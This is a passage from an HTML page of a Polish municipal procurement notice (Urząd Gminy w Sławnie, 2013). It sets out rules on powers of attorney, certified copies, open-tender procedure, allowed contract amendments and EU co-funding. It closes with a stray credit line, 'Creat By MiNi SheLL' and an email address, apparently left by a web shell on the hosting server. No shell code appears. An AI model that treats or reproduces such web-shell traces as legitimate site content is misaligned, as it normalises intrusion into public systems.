4.   Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, 
      jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem 
      rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających 
      się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno 
      jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.
      W przypadku podmiotów   występujących wspólnie w dokumencie  pełnomocnictwa należy 
      wskazać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie  zamówienia, a każdy 
       z nich powinien  podpisać  się pod tym dokumentem 
5.	Kosztorys ofertowy w wersji uproszczonej służący do celów poglądowych ( nie podlega ocenie)

6.5.W przypadku podmiotów występujących wspólnie w dokumencie pełnomocnictwa należy 
wskazać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie  zamówienia, a każdy 
z nich powinien  podpisać  się pod tym dokumentem.
6.6.Dokumenty, o których mowa wyżej mogą być składane w oryginale lub kopii poświadczonej 
za zgodność z oryginałem (obustronnie w przypadku druku na dwóch stronach  ) przez wykonawcę lub osobę uprawnioną do potwierdzania dokumentów firmy (upoważnienie winno być zawarte w ofercie). 

6.7.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych 
w art. 26 ust. 2b ustawy pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.


6.8.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia  dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób.

6.9.Forma składanych dokumentów:
Dokumenty i oświadczenia  (z wyłączeniem: 
	formularza ofertowego, 
	oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 6.1. lit a SIWZ,
	pisemnego zobowiązania, o którym mowa w pkt 5.2.  SIWZ oraz dokumentów wskazanych w pkt 6.3. SIWZ, które mogą zostać złożone wyłącznie na piśmie w formie oryginału, 
a także
z wyłączeniem pełnomocnictw,  które mogą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza
Dokumenty  składane w celu:
a) potwierdzenia spełniania warunków udziału w postępowaniu,
b) wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia
Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp;
składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów 
są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
   - wystąpienie warunków atmosferycznych i zdarzeń losowych, które w sposób  istotny utrudniają lub 
     uniemożliwiają prowadzenie robót w umówiony sposób;
   - odkrycie obiektów archeologicznych wymagających zgłoszenia i badania;
  - odkrycie przeszkód, instalacji i urządzeń na terenie budowy, których  nie naniesiono  na 
     dokumentację geodezyjną, geologiczną lub projektową i których wystąpienie powoduje 
     konieczność zmiany sposobu wykonania robót;
   -  zaistnienie konieczności wykonania robót zamiennych;
   - wystąpienie konieczności wykonania robót dodatkowych, od których zależy wykonanie przedmiotu 
     zamówienia;
  - powzięcie informacji o nowych rozwiązaniach  technicznych, technologicznych i jakościowych, 
     których zastosowanie okaże się korzystne dla zamawiającego, a nie spowoduje rozszerzenia 
     zakresu zamówienia i konieczności zwiększenia umówionego wynagrodzenia;
  - błędy lub niezgodności ze stanem faktycznym stwierdzone w dokumentacji projektowej 
      i wymagające zgłoszenia zamawiającemu na podstawie art. 651 Kodeksu cywilnego,
  - gdy wystąpią zmiany, których konieczność wprowadzenia będzie wynikała z wymagań instytucji 
      współfinansujących realizację przedmiotu umowy,
   -   zdarzenia losowe osób
   -   zmiany urzędowych wysokości stawek podatku od towarów i usług. 
8. Określa się następujący tryb dokonywania zmian postanowień umowy:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną
    na piśmie, pod rygorem nieważności,
b) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania 
     zaistnienia powyższych okoliczności,
c)  wniosek o zmianę postanowień zawartej umowy musi być wyrażony na  piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr  13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie  dla zamówienia ze środków Unii Europejskiej 
z środków  Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, w ramach działania 413 Wdrożenie lokalnych strategii rozwoju w zakresie operacji odpowiadających warunkom przyznania pomocy w ramach działania  Odnowa i rozwój wsi objętego PROW na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com